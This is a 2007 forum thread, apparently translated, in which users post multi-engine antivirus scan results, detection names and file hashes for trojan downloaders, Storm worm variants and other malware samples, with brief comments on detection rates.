Sunbelt info: Virtumonde is an adware program that displays pop-up advertisements on the desktop. Virtumonde also downloads other software from various remote servers.
```

----------


## santy

File Trojan.DownLoader.Nurech.BV.rar received on 08.31.2007 12:06:45 (CET)

Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.9.1.0	2007.08.31	-
AntiVir	7.4.1.66	2007.08.31	-
Authentium	4.93.8	2007.08.31	-
Avast	4.7.1029.0	2007.08.30	-
*AVG	7.5.0.484	2007.08.31	Downloader.Generic5.TWO*
BitDefender	7.2	2007.08.31	-
CAT-QuickHeal	9.00	2007.08.30	-
*ClamAV	0.91.2	2007.08.31	Trojan.Downloader-12895*
*DrWeb	4.33	2007.08.31	Trojan.DownLoader.30458*
eSafe	7.0.15.0	2007.08.29	-
eTrust-Vet	31.1.5099	2007.08.31	-
Ewido	4.0	2007.08.30	-
FileAdvisor	1	2007.08.31	-
Fortinet	3.11.0.0	2007.08.31	-
*F-Prot	4.3.2.48	2007.08.31	W32/Trojan.BVZH*
F-Secure	6.70.13030.0	2007.08.31	-
*Ikarus	T3.1.1.12	2007.08.31	Trojan-Downloader.Win32.Small.evh*
Kaspersky	4.0.2.24	2007.08.31	-
*McAfee	5109	2007.08.30	Downloader-AAP.gen*
*Microsoft	1.2803	2007.08.31	TrojanDownloader:Win32/Agent.ABZ*
*NOD32v2	2493	2007.08.31	a variant of Win32/TrojanDownloader.Nurech.BV*
Norman	5.80.02	2007.08.30	-
Panda	9.0.0.4	2007.08.31	-
Prevx1	V2	2007.08.31	-
Rising	19.38.42.00	2007.08.31	-
*Sophos	4.21.0	2007.08.31	Mal/Clagger-G*
Sunbelt	2.2.907.0	2007.08.25	-
Symantec	10	2007.08.31	-
TheHacker	6.1.9.175	2007.08.31	-
*VBA32	3.12.2.3	2007.08.30	Trojan.Win32.Inject.dj*
VirusBuster	4.3.26:9	2007.08.30	-
*Webwasher-Gateway	6.0.1	2007.08.31	Trojan.Dldr.LooksLike.Tiny!7782*
Additional information
File size: 3730 bytes
MD5: a7e49a314b2cba8f8c5f073ff08bd29e
SHA1: 2371c27b28a5a76787ee47b5b842b55ea779f73c

----------


## maXmo

AhnLab-V3	2007.9.1.0	2007.08.31	-
*AntiVir	7.4.1.66	2007.08.31	TR/Dldr.Small.ety.5*
Authentium	4.93.8	2007.08.31	-
Avast	4.7.1029.0	2007.08.30	-
*AVG	7.5.0.484	2007.08.31	Obfustat.JDC*
BitDefender	7.2	2007.08.31	-
*CAT-QuickHeal	9.00	2007.08.31	(Suspicious) - DNAScan*
ClamAV	0.91.2	2007.08.31	-
*DrWeb	4.33	2007.08.31	Trojan.Packed.166
eSafe	7.0.15.0	2007.08.29	suspicious Trojan/Worm*
eTrust-Vet	31.1.5099	2007.08.31	-
Ewido	4.0	2007.08.31	-
FileAdvisor	1	2007.08.31	-
*Fortinet	3.11.0.0	2007.08.31	W32/Small.ETY!tr.dldr*
F-Prot	4.3.2.48	2007.08.31	-
*F-Secure	6.70.13030.0	2007.08.31	Trojan-Downloader.Win32.Small.ety
Ikarus	T3.1.1.12	2007.08.31	Trojan-PWS.Win32.LdPinch.atw
Kaspersky	4.0.2.24	2007.08.31	Trojan-Downloader.Win32.Small.ety
McAfee	5109	2007.08.30	New Malware.bl*
Microsoft	1.2803	2007.08.31	-
NOD32v2	2493	2007.08.31	-
*Norman	5.80.02	2007.08.31	W32/DLoader.DEUB
Panda	9.0.0.4	2007.08.31	Generic Malware*
Prevx1	V2	2007.08.31	-
*Rising	19.38.42.00	2007.08.31	Packer.RyCrypt
Sophos	4.21.0	2007.08.31	Mal/EncPk-AW
Sunbelt	2.2.907.0	2007.08.25	VIPRE.Suspicious*
Symantec	10	2007.08.31	-
*TheHacker	6.1.9.175	2007.08.31	Trojan/Downloader.Small.ety
VBA32	3.12.2.3	2007.08.30	Trojan-Downloader.Win32.Small.ety
VirusBuster	4.3.26:9	2007.08.30	Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway	6.0.1	2007.08.31	Trojan.Dldr.Small.ety.5*
Additional information
File size: 14790 bytes
MD5: d175dbe7caf6fda6bb6395462516d7fd
SHA1: 1622c193cd9e81528ced6bdb6e11fc32d32b5a83
packers: RCrypt

looks like it's just a downloader, I'll go see what it has downloaded  :Cheesy: 

…hmm

*Added 1 hour 2 minutes later*

it did pull stuff down after all…

AhnLab-V3	2007.9.1.0	2007.08.31	-
*AntiVir	7.4.1.66	2007.08.31	TR/Crypt.U.Gen*
Authentium	4.93.8	2007.08.31	-
Avast	4.7.1029.0	2007.08.30	-
AVG	7.5.0.484	2007.08.31	-
BitDefender	7.2	2007.08.31	-
CAT-QuickHeal	9.00	2007.08.31	-
ClamAV	0.91.2	2007.08.31	-
*DrWeb	4.33	2007.08.31	Trojan.PWS.LDPinch.1941
eSafe	7.0.15.0	2007.08.29	suspicious Trojan/Worm*
eTrust-Vet	31.1.5099	2007.08.31	-
Ewido	4.0	2007.08.31	-
FileAdvisor	1	2007.08.31	-
Fortinet	3.11.0.0	2007.08.31	-
F-Prot	4.3.2.48	2007.08.31	-
*F-Secure	6.70.13030.0	2007.08.31	Trojan-PSW.Win32.LdPinch.cgu*
Ikarus	T3.1.1.12	2007.08.31	-
*Kaspersky	4.0.2.24	2007.08.31	Trojan-PSW.Win32.LdPinch.cgu
McAfee	5109	2007.08.30	New Malware.bm*
Microsoft	1.2803	2007.08.31	-
NOD32v2	2493	2007.08.31	-
Norman	5.80.02	2007.08.31	-
Panda	9.0.0.4	2007.08.31	-
Prevx1	V2	2007.08.31	-
Rising	19.38.42.00	2007.08.31	-
*Sophos	4.21.0	2007.08.31	Mal/Basine-C
Sunbelt	2.2.907.0	2007.08.25	VIPRE.Suspicious*
Symantec	10	2007.08.31	-
TheHacker	6.1.9.175	2007.08.31	-
VBA32	3.12.2.3	2007.08.30	-
VirusBuster	4.3.26:9	2007.08.30	-
*Webwasher-Gateway	6.0.1	2007.08.31	Trojan.Crypt.U.Gen*

Additional information
File size: 20480 bytes
MD5: 0a5c7f5e109b57f67ef2a68bd5235e7d
SHA1: e176d36fabdfca20620a83948118c60c9c5dfbe2


AhnLab-V3	2007.9.1.0	2007.08.31	-
AntiVir	7.4.1.66	2007.08.31	-
Authentium	4.93.8	2007.08.31	-
Avast	4.7.1029.0	2007.08.30	-
AVG	7.5.0.484	2007.08.31	-
BitDefender	7.2	2007.08.31	-
CAT-QuickHeal	9.00	2007.08.31	-
ClamAV	0.91.2	2007.08.31	-
DrWeb	4.33	2007.08.31	-
eSafe	7.0.15.0	2007.08.29	-
eTrust-Vet	31.1.5099	2007.08.31	-
Ewido	4.0	2007.08.31	-
FileAdvisor	1	2007.08.31	-
Fortinet	3.11.0.0	2007.08.31	-
F-Prot	4.3.2.48	2007.08.31	-
F-Secure	6.70.13030.0	2007.08.31	-
*Ikarus	T3.1.1.12	2007.08.31	Win32.SuspectCrc*
Kaspersky	4.0.2.24	2007.08.31	-
McAfee	5109	2007.08.30	-
Microsoft	1.2803	2007.08.31	-
NOD32v2	2493	2007.08.31	-
*Norman	5.80.02	2007.08.31	W32/Xorpix.ED*
Panda	9.0.0.4	2007.08.31	-
Prevx1	V2	2007.08.31	-
Rising	19.38.42.00	2007.08.31	-
Sophos	4.21.0	2007.08.31	-
*Sunbelt	2.2.907.0	2007.08.25	Trojan-Downloader.Win32.Small.nhl*
Symantec	10	2007.08.31	-
TheHacker	6.1.9.175	2007.08.31	-
VBA32	3.12.2.3	2007.08.30	-
VirusBuster	4.3.26:9	2007.08.30	-
Webwasher-Gateway	6.0.1	2007.08.31	-

Additional information
File size: 2560 bytes
MD5: 58df7dc91763549d858991505ae65f3c
SHA1: 5a7f105b498b2e2cd29895c9915480b434fce16f

so go figure whether these are false positives or not


*AhnLab-V3	2007.9.1.0	2007.08.31	Win-Trojan/Downloader.12375
AntiVir	7.4.1.66	2007.08.31	TR/Crypt.XPACK.Gen*
Authentium	4.93.8	2007.08.31	-
Avast	4.7.1029.0	2007.08.30	-
*AVG	7.5.0.484	2007.08.31	Downloader.Generic6.AUO
BitDefender	7.2	2007.08.31	Trojan.AVKiller.AS
CAT-QuickHeal	9.00	2007.08.31	TrojanDownloader.Small.evl*
ClamAV	0.91.2	2007.08.31	-
*DrWeb	4.33	2007.08.31	Trojan.MulDrop.8347
eSafe	7.0.15.0	2007.08.29	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5099	2007.08.31	-
Ewido	4.0	2007.08.31	-
FileAdvisor	1	2007.08.31	-
Fortinet	3.11.0.0	2007.08.31	-
F-Prot	4.3.2.48	2007.08.31	-
*F-Secure	6.70.13030.0	2007.08.31	Trojan-Downloader.Win32.Small.evl
Ikarus	T3.1.1.12	2007.08.31	Trojan-Downloader.Win32.Small.evl
Kaspersky	4.0.2.24	2007.08.31	Trojan-Downloader.Win32.Small.evl*
McAfee	5109	2007.08.30	-
Microsoft	1.2803	2007.08.31	-
NOD32v2	2493	2007.08.31	-
Norman	5.80.02	2007.08.31	-
*Panda	9.0.0.4	2007.08.31	Suspicious file
Prevx1	V2	2007.08.31	Generic.Malware*
Rising	19.38.42.00	2007.08.31	-
Sophos	4.21.0	2007.08.31	-
Sunbelt	2.2.907.0	2007.08.25	-
Symantec	10	2007.08.31	-
TheHacker	6.1.9.175	2007.08.31	-
VBA32	3.12.2.3	2007.08.30	-
*VirusBuster	4.3.26:9	2007.08.30	Trojan.DL.Small.VIY
Webwasher-Gateway	6.0.1	2007.08.31	Trojan.Crypt.XPACK.Gen*

Additional information
File size: 12375 bytes
MD5: 57f3e4dcefb97222c500a655a451a62a
SHA1: 20f6835a99218eb0410dec50ccf8bd483a2e7ad3
Prevx info: http://fileinfo.prevx.com/fileinfo.a...3B8B00D916ABC2

----------


## icon

> Norman 5.80.02 2007.08.31 W32/Xorpix.ED


At least Norman gives you something to think about.  :Smiley:

----------


## Макcим

File index.html received on 08.31.2007 19:06:45 (CET)


> AhnLab-V3	2007.9.1.0	2007.08.31	-
> *AntiVir	7.4.1.66	2007.08.31	HTML/Crypted.Gen*
> Authentium	4.93.8	2007.08.31	-
> Avast	4.7.1029.0	2007.08.30	-
> AVG	7.5.0.484	2007.08.31	-
> BitDefender	7.2	2007.08.31	-
> CAT-QuickHeal	9.00	2007.08.31	-
> ClamAV	0.91.2	2007.08.31	-
> DrWeb	4.33	2007.08.31	-
> ...

----------


## Winsent

File _________________________________ received on 08.31.2007 20:37:43 (CET)
Current status:    finished 
Result: 9/32 (28.13%) 

Antivirus	Version	Last Update	Result

AhnLab-V3	2007.9.1.0	2007.08.31	-
*AntiVir	7.4.1.66	2007.08.31	HEUR/Malware*
Authentium	4.93.8	2007.08.31	-
Avast	4.7.1029.0	2007.08.31	-
*AVG	7.5.0.484	2007.08.31	Worm/Agobot.FWG*
BitDefender	7.2	2007.08.31	-
CAT-QuickHeal	9.00	2007.08.31	-
ClamAV	0.91.2	2007.08.31	-
DrWeb	4.33	2007.08.31	-
eSafe	7.0.15.0	2007.08.29	-
eTrust-Vet	31.1.5099	2007.08.31	-
Ewido	4.0	2007.08.31	-
FileAdvisor	1	2007.08.31	-
Fortinet	3.11.0.0	2007.08.31	-
F-Prot	4.3.2.48	2007.08.31	-
*F-Secure	6.70.13030.0	2007.08.31	Trojan-Dropper.Win32.Agent.bro*
Ikarus	T3.1.1.12	2007.08.31	-
*Kaspersky	4.0.2.24	2007.08.31	Trojan-Dropper.Win32.Agent.bro
McAfee	5110	2007.08.31	New Malware.n*
Microsoft	1.2803	2007.08.31	-
NOD32v2	2494	2007.08.31	-
Norman	5.80.02	2007.08.31	-
*Panda	9.0.0.4	2007.08.31	Suspicious file*
Prevx1	V2	2007.08.31	-
Rising	19.38.42.00	2007.08.31	-
*Sophos	4.21.0	2007.08.31	Mal/Packer*
Sunbelt	2.2.907.0	2007.08.25	-
Symantec	10	2007.08.31	-
TheHacker	6.1.9.175	2007.08.31	-
*VBA32	3.12.2.3	2007.08.30	Backdoor.Win32.Agobot.ajr*
VirusBuster	4.3.26:9	2007.08.31	-
*Webwasher-Gateway	6.0.1	2007.08.31	Heuristic.Malware*

Additional information
File size: 156686 bytes
MD5: 8fa1d7c14d11d2b45c72771a97677366
SHA1: 4b3ece5ddccc3bfa7a3ce3881f6e41e30cbba4ba
packers: UPACK

----------


## Winsent

File INFO.txt_.scr received on 09.01.2007 15:21:02 (CET)
Current status:    finished 
Result: 14/32 (43.75%) 


Antivirus	Version	Last Update	Result

AhnLab-V3	2007.9.1.0	2007.09.01	-
*AntiVir	7.4.1.66	2007.08.31	TR/Crypt.XPACK.Gen*
Authentium	4.93.8	2007.09.01	-
*Avast	4.7.1029.0	2007.09.01	Win32:Mytob-TC
AVG	7.5.0.484	2007.08.31	Generic7.CXR*
BitDefender	7.2	2007.09.01	*GenPack:[email protected]
CAT-QuickHeal	9.00	2007.09.01	(Suspicious) - DNAScan*
ClamAV	0.91.2	2007.09.01	-
DrWeb	4.33	2007.09.01	-
*eSafe	7.0.15.0	2007.08.29	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5100	2007.08.31	-
Ewido	4.0	2007.09.01	-
FileAdvisor	1	2007.09.01	-
Fortinet	3.11.0.0	2007.09.01	-
F-Prot	4.3.2.48	2007.08.31	-
*F-Secure	6.70.13030.0	2007.08.31	Net-Worm.Win32.Mytob.ft
Ikarus	T3.1.1.12	2007.09.01	Backdoor.Win32.IRCBot.acd
Kaspersky	4.0.2.24	2007.09.01	Net-Worm.Win32.Mytob.ft*
McAfee	5110	2007.08.31	-
Microsoft	1.2803	2007.09.01	-
*NOD32v2	2495	2007.09.01	Win32/Mytob.VW*
Norman	5.80.02	2007.08.31	-
*Panda	9.0.0.4	2007.09.01	Suspicious file*
Prevx1	V2	2007.09.01	-
*Rising	19.38.52.00	2007.09.01	Backdoor.Win32.IRCbot.bcr*
Sophos	4.21.0	2007.09.01	-
Sunbelt	2.2.907.0	2007.08.31	-
*Symantec	10	2007.09.01	W32.IRCBot.Gen*
TheHacker	6.1.9.175	2007.08.31	-
VBA32	3.12.2.3	2007.09.01	-
VirusBuster	4.3.26:9	2007.08.31	-
*Webwasher-Gateway	6.0.1	2007.08.31	Trojan.Crypt.XPACK.Gen*

Additional information
File size: 144896 bytes
MD5: 016fb3fe28384a10a78cfafdc87c417d
SHA1: 151f2ac08bf39d775b83a8b6cb17bee458ac3d81
packers: NTKrnl

----------


## Mr.Page

File sysuusi.exe received on 09.02.2007 17:51:34 (CET)
Result: 7/32 *21.88%*

Antivirus Version Last Update Result 

AhnLab-V3 2007.9.1.0 2007.09.01 - 
AntiVir 7.4.1.66 2007.09.01 - 
Authentium 4.93.8 2007.09.02 - 
Avast 4.7.1029.0 2007.09.01 - 
AVG 7.5.0.484 2007.09.02 - 
BitDefender 7.2 2007.09.02 - 
CAT-QuickHeal 9.00 2007.09.01 - 
ClamAV 0.91.2 2007.09.02 - 
*DrWeb 4.33 2007.09.02 Trojan.MulDrop.8473* 
*eSafe 7.0.15.0 2007.09.02 Win32.QQPass* 
eTrust-Vet 31.1.5100 2007.08.31 - 
Ewido 4.0 2007.09.02 - 
FileAdvisor 1 2007.09.02 - 
Fortinet 3.11.0.0 2007.09.02 - 
F-Prot 4.3.2.48 2007.09.02 - 
*F-Secure 6.70.13030.0 2007.09.02 Trojan-Spy.Win32.Webmoner.do* 
*Ikarus T3.1.1.12 2007.09.02 Trojan-Dropper.Win32.Delf.MM* 
*Kaspersky 4.0.2.24 2007.09.02 Trojan-Spy.Win32.Webmoner.do* 
McAfee 5110 2007.08.31 - 
Microsoft 1.2803 2007.09.02 - 
NOD32v2 2497 2007.09.01 - 
*Norman 5.80.02 2007.09.02 W32/Malware.AHSU* 
*Panda 9.0.0.4 2007.09.02 Suspicious file* 
Prevx1 V2 2007.09.02 - 
Rising 19.38.62.00 2007.09.02 - 
Sophos 4.21.0 2007.09.02 - 
Sunbelt 2.2.907.0 2007.08.31 - 
Symantec 10 2007.09.02 - 
TheHacker 6.1.9.175 2007.09.02 - 
VBA32 3.12.2.3 2007.09.01 - 
VirusBuster 4.3.26:9 2007.09.02 - 
Webwasher-Gateway 6.0.1 2007.09.01 - 

Additional information 
File size: 18432 bytes 
MD5: 4a7a6d06b861b9da75434d7fc85f767a 
SHA1: f6d36dcb0b8bf37995cb85ecc585015f663a7585

----------


## drongo

T=12139


```
AhnLab-V3	2007.9.1.0	2007.09.03	-
AntiVir	7.4.1.66	2007.09.02	HEUR/Crypted
Authentium	4.93.8	2007.09.02	-
Avast	4.7.1029.0	2007.09.02	-
AVG	7.5.0.484	2007.09.02	Obfustat.JZS
BitDefender	7.2	2007.09.03	-
CAT-QuickHeal	9.00	2007.09.01	(Suspicious) - DNAScan
ClamAV	0.91.2	2007.09.03	-
DrWeb	4.33	2007.09.03	-
eSafe	7.0.15.0	2007.09.02	-
eTrust-Vet	31.1.5100	2007.08.31	-
Ewido	4.0	2007.09.02	-
FileAdvisor	1	2007.09.03	-
Fortinet	3.11.0.0	2007.09.03	-
F-Prot	4.3.2.48	2007.09.02	-
F-Secure	6.70.13030.0	2007.09.03	-
Ikarus	T3.1.1.12	2007.09.03	Email-Worm.Win32.Locksky.be
Kaspersky	4.0.2.24	2007.09.03	-
McAfee	5110	2007.08.31	-
Microsoft	1.2803	2007.09.03	-
NOD32v2	2498	2007.09.03	-
Norman	5.80.02	2007.09.02	W32/Tibs.ASKH
Panda	9.0.0.4	2007.09.02	Suspicious file
Prevx1	V2	2007.09.03	Trojan.VXGAME
Rising	19.39.01.00	2007.09.03	Trojan.Win32.Agent.vyl
Sophos	4.21.0	2007.09.03	-
Symantec	10	2007.09.03	-
TheHacker	6.1.9.175	2007.09.02	-
VBA32	3.12.2.3	2007.09.01	-
VirusBuster	4.3.26:9	2007.09.02	Packed/FRBR
Webwasher-Gateway	6.0.1	2007.09.02	Heuristic.Crypted
Additional information
File size: 11264 bytes
MD5: 7c4ca0b78d51494df0aadd61dcee6f30
SHA1: 33c1257bd894ef72951e5233bf35ef0c756a7800
packers: BINARYRES
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PX5=2985B6FE002E09362CBC004B1E87A000DDF2FF76
```

----------


## mayas

File default.php received on 09.03.2007 18:51:09 (CET)
Result: 4/32 (12.5%)


Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.9.1.0	2007.09.03	-
AntiVir	7.4.1.66	2007.09.03	*HTML/Crypted.Gen*
Authentium	4.93.8	2007.09.02	-
Avast	4.7.1029.0	2007.09.03	-
AVG	7.5.0.485	2007.09.03	-
BitDefender	7.2	2007.09.03	-
CAT-QuickHeal	9.00	2007.09.03	-
ClamAV	0.91.2	2007.09.03	-
DrWeb	4.33	2007.09.03	-
eSafe	7.0.15.0	2007.09.02	-
eTrust-Vet	31.1.5105	2007.09.03	-
Ewido	4.0	2007.09.03	-
FileAdvisor	1	2007.09.03	-
Fortinet	3.11.0.0	2007.09.03	-
F-Prot	4.3.2.48	2007.09.02	-
F-Secure	6.70.13030.0	2007.09.03	*Trojan-Clicker.HTML.IFrame.ac*
Ikarus	T3.1.1.12	2007.09.03	-
Kaspersky	4.0.2.24	2007.09.03	*Trojan-Clicker.HTML.IFrame.ac*
McAfee	5110	2007.08.31	-
Microsoft	1.2803	2007.09.03	-
NOD32v2	2499	2007.09.03	-
Norman	5.80.02	2007.09.03	-
Panda	9.0.0.4	2007.09.03	-
Prevx1	V2	2007.09.03	-
Rising	19.39.02.00	2007.09.03	-
Sophos	4.21.0	2007.09.03	-
Sunbelt	2.2.907.0	2007.08.31	-
Symantec	10	2007.09.03	-
TheHacker	6.1.9.175	2007.09.02	-
VBA32	3.12.2.3	2007.09.03	-
VirusBuster	4.3.26:9	2007.09.03	-
Webwasher-Gateway	6.0.1	2007.09.03	*Script.Crypted.Gen*

----------


## XL

Yet another Storm zhelatin




> File labor.exe received on 09.03.2007 21:23:32 (CET)
> Current status:    finished 
> Result: 15/32 (46.88%) 
> Antivirus	Version	Last Update	Result
> AhnLab-V3	2007.9.1.0	2007.09.03	-
> *AntiVir	7.4.1.66	2007.09.03	Worm/Storm.tch*
> Authentium	4.93.8	2007.09.02	-
> Avast	4.7.1029.0	2007.09.03	-
> ...

----------


## drongo

t=12160


```
File avz00001.dta received on 09.03.2007 22:26:26 (CET)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.9.1.0	2007.09.03	-
AntiVir	7.4.1.66	2007.09.03	-
Authentium	4.93.8	2007.09.02	-
Avast	4.7.1029.0	2007.09.03	-
AVG	7.5.0.485	2007.09.03	PSW.Agent.NWI
BitDefender	7.2	2007.09.03	-
CAT-QuickHeal	9.00	2007.09.03	-
ClamAV	0.91.2	2007.09.03	Trojan.Agent-7550
DrWeb	4.33	2007.09.03	Trojan.NtRootKit.361
eSafe	7.0.15.0	2007.09.03	-
eTrust-Vet	31.1.5105	2007.09.03	-
Ewido	4.0	2007.09.03	-
FileAdvisor	1	2007.09.03	-
Fortinet	3.11.0.0	2007.09.03	-
F-Prot	4.3.2.48	2007.09.02	-
F-Secure	6.70.13030.0	2007.09.03	-
Ikarus	T3.1.1.12	2007.09.03	-
Kaspersky	4.0.2.24	2007.09.03	-
McAfee	5111	2007.09.03	-
Microsoft	1.2803	2007.09.03	-
NOD32v2	2500	2007.09.03	Win32/SpamTool.Agent.NAJ
Norman	5.80.02	2007.09.03	-
Panda	9.0.0.4	2007.09.03	-
Prevx1	V2	2007.09.03	-
Rising	19.39.02.00	2007.09.03	-
Sophos	4.21.0	2007.09.03	-
Sunbelt	2.2.907.0	2007.08.31	-
Symantec	10	2007.09.03	-
TheHacker	6.1.9.175	2007.09.02	-
VBA32	3.12.2.3	2007.09.03	-
VirusBuster	4.3.26:9	2007.09.03	-
Webwasher-Gateway	6.0.1	2007.09.03	-
Additional information
File size: 18944 bytes
MD5: 13a366eef1bf920ffcf754716fda7ade
SHA1: a614eae1da5ee91f034958e23ebd8410ae981115
```


Brand-new nastiness: hardly anyone knows it yet:


```
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.9.1.0	2007.09.03	-
AntiVir	7.4.1.66	2007.09.03	HEUR/Crypted
Authentium	4.93.8	2007.09.02	-
Avast	4.7.1029.0	2007.09.03	-
AVG	7.5.0.485	2007.09.03	Win32/PolyCrypt
BitDefender	7.2	2007.09.03	-
CAT-QuickHeal	9.00	2007.09.03	(Suspicious) - DNAScan
ClamAV	0.91.2	2007.09.03	-
DrWeb	4.33	2007.09.03	-
eSafe	7.0.15.0	2007.09.03	Suspicious Trojan/Worm
eTrust-Vet	31.1.5105	2007.09.03	-
Ewido	4.0	2007.09.03	-
FileAdvisor	1	2007.09.03	-
Fortinet	3.11.0.0	2007.09.03	-
F-Prot	4.3.2.48	2007.09.02	-
F-Secure	6.70.13030.0	2007.09.03	-
Ikarus	T3.1.1.12	2007.09.03	-
Kaspersky	4.0.2.24	2007.09.03	-
McAfee	5111	2007.09.03	-
Microsoft	1.2803	2007.09.03	-
NOD32v2	2500	2007.09.03	-
Norman	5.80.02	2007.09.03	-
Panda	9.0.0.4	2007.09.03	Suspicious file
Prevx1	V2	2007.09.03	-
Rising	19.39.02.00	2007.09.03	-
Sophos	4.21.0	2007.09.03	-
Sunbelt	2.2.907.0	2007.08.31	VIPRE.Suspicious
Symantec	10	2007.09.03	-
TheHacker	6.1.9.175	2007.09.02	-
VBA32	3.12.2.3	2007.09.03	-
VirusBuster	4.3.26:9	2007.09.03	-
Webwasher-Gateway	6.0.1	2007.09.03	Heuristic.Crypted
Additional information
File size: 39317 bytes
MD5: e11af9ecc9308640109cd11b121325b1
SHA1: fb1be9b5ebc55a942b2c9241fa32a37e2a05d792
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
```

----------


## Kuzz

Antivirus Version Last Update Result 
AhnLab-V3 2007.9.5.0 2007.09.05 - 
*AntiVir 7.6.0.5 2007.09.05 Worm/Sdbot.477184.1* 
Authentium 4.93.8 2007.09.05 - 
Avast 4.7.1029.0 2007.09.05 - 
*AVG 7.5.0.485 2007.09.05 SHeur.WT* 
*BitDefender 7.2 2007.09.05 DeepScan:Generic.Sdbot.EF3BEBB4 
CAT-QuickHeal 9.00 2007.09.05 Backdoor.SdBot.gen 
ClamAV 0.91.2 2007.09.05 Trojan.SdBot-6773* 
DrWeb 4.33 2007.09.05 - 
eSafe 7.0.15.0 2007.09.04 - 
*eTrust-Vet 31.1.5111 2007.09.05 Win32/Rbot.HNM* 
Ewido 4.0 2007.09.05 - 
FileAdvisor 1 2007.09.05 - 
Fortinet 3.11.0.0 2007.09.05 - 
F-Prot 4.3.2.48 2007.09.05 - 
F-Secure 6.70.13030.0 2007.09.05 - 
*Ikarus T3.1.1.12 2007.09.05 Backdoor.VB.EV* 
Kaspersky 4.0.2.24 2007.09.05 - 
McAfee 5112 2007.09.04 - 
Microsoft 1.2803 2007.09.05 - 
*NOD32v2 2507 2007.09.05 a variant of Win32/Packed.Themida* 
Norman 5.80.02 2007.09.05 - 
*Panda 9.0.0.4 2007.09.05 W32/Gaobot.OXI.worm* 
Prevx1 V2 2007.09.05 - 
*Rising 19.39.22.00 2007.09.05 Backdoor.Win32.Gaobot.puv* 
Sophos 4.21.0 2007.09.05 - 
*Sunbelt 2.2.907.0 2007.09.05 VIPRE.Suspicious 
Symantec 10 2007.09.05 W32.Spybot.Worm* 
TheHacker 6.1.9.178 2007.09.05 - 
VBA32 3.12.2.3 2007.09.04 - 
VirusBuster 4.3.26:9 2007.09.05 - 
*Webwasher-Gateway 6.0.1 2007.09.05 Worm.Sdbot.477184.1* 
Additional information 
File size: 480256 bytes 
MD5: a54dc72f86874da7b1ece729d2a2cd7f 
SHA1: 67540d3afa9e7793e157911c93944adb8d67c274 
packers: Themida 
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

Has NOD already started detecting only packers and crypters??

----------



## XL

An update of the Storm zhelatin.
File tor.exe received on 2007.09.06 20:31:50 (CET)




> AhnLab-V3	2007.9.5.0	2007.09.06	-
> *AntiVir	7.6.0.5	2007.09.06	Worm/Stom.tcl*
> Authentium	4.93.8	2007.09.06	-
> Avast	4.7.1029.0	2007.09.06	-
> *AVG	7.5.0.485	2007.09.06	Downloader.Tibs
> BitDefender	7.2	2007.09.06	Trojan.Peed.IID
> CAT-QuickHeal	9.00	2007.09.06	(Suspicious) - DNAScan*
> ClamAV	0.91.2	2007.09.06	-
> *DrWeb	4.33	2007.09.06	Trojan.Packed.142
> ...

----------


## Синауридзе Александр

File svcipa.exe received on 2007.09.09 13:45:44 (CET)

AhnLab-V3 2007.9.8.0 2007.09.07 - 
AntiVir 7.6.0.5 2007.09.08 - 
Authentium 4.93.8 2007.09.07 - 
Avast 4.7.1043.0 2007.09.08 - 
AVG 7.5.0.485 2007.09.09 - 
BitDefender 7.2 2007.09.09 - 
CAT-QuickHeal 9.00 2007.09.08 - 
ClamAV 0.91.2 2007.09.09 - 
*DrWeb 4.33 2007.09.08 Trojan.DownLoader.32552* 
*eSafe 7.0.15.0 2007.09.04 suspicious Trojan/Worm* 
eTrust-Vet 31.1.5119 2007.09.08 - 
Ewido 4.0 2007.09.09 - 
FileAdvisor 1 2007.09.09 - 
Fortinet 3.11.0.0 2007.09.08 - 
F-Prot 4.3.2.48 2007.09.09 - 
F-Secure 6.70.13030.0 2007.09.09 - 
*Ikarus T3.1.1.12 2007.09.09 Backdoor.Win32.Agent.ark* 
Kaspersky 4.0.2.24 2007.09.09 - 
McAfee 5115 2007.09.07 - 
Microsoft 1.2803 2007.09.09 - 
NOD32v2 2515 2007.09.09 - 
Norman 5.80.02 2007.09.07 - 
*Panda 9.0.0.4 2007.09.09 Trj/Agent.GKG* 
Prevx1 V2 2007.09.09 - 
Rising 19.39.62.00 2007.09.09 - 
*Sophos 4.21.0 2007.09.09 Mal/HckPk-A* 
Sunbelt 2.2.907.0 2007.09.07 - 
Symantec 10 2007.09.09 - 
TheHacker 6.1.10.182 2007.09.08 - 
VBA32 3.12.2.4 2007.09.08 - 
VirusBuster 4.3.26:9 2007.09.08 - 
*Webwasher-Gateway 6.0.1 2007.09.08 Win32.ModifiedUPX.gen!84 (suspicious)* 

Additional information
File size: 21690 bytes 
MD5: d88e8c2198e685f0907c77a396dc6a7e 
SHA1: f08536f58d94e610b913dd25eeb6cf67b97083a3 
packers: UPX

----------


## Winsent

File index.html received on 2007.09.09 19:05:23 (CET)
Current status:   finished
Result: 7/32 (21.88%)


Antivirus	Version	Last Update	Result

AhnLab-V3	2007.9.8.0	2007.09.07	-
AntiVir	7.6.0.5	2007.09.08	-
Authentium	4.93.8	2007.09.09	-
Avast	4.7.1043.0	2007.09.08	-
*AVG	7.5.0.485	2007.09.09	JS/Psyme*
BitDefender	7.2	2007.09.09	-
CAT-QuickHeal	9.00	2007.09.08	-
*ClamAV	0.91.2	2007.09.09	JS.Agent-3*
DrWeb	4.33	2007.09.08	-
*eSafe	7.0.15.0	2007.09.04	JS.Feebs*
eTrust-Vet	31.1.5119	2007.09.08	-
Ewido	4.0	2007.09.09	-
FileAdvisor	1	2007.09.09	-
Fortinet	3.11.0.0	2007.09.08	-
F-Prot	4.3.2.48	2007.09.09	-
*F-Secure	6.70.13030.0	2007.09.09	Trojan-Clicker.JS.Agent.h*
Ikarus	T3.1.1.12	2007.09.09	-
*Kaspersky	4.0.2.24	2007.09.09	Trojan-Clicker.JS.Agent.h*
McAfee	5115	2007.09.07	-
*Microsoft	1.2803	2007.09.09	TrojanDownloader:JS/Psyme.gen*
NOD32v2	2515	2007.09.09	-
Norman	5.80.02	2007.09.07	-
Panda	9.0.0.4	2007.09.09	-
Prevx1	V2	2007.09.09	-
Rising	19.39.62.00	2007.09.09	-
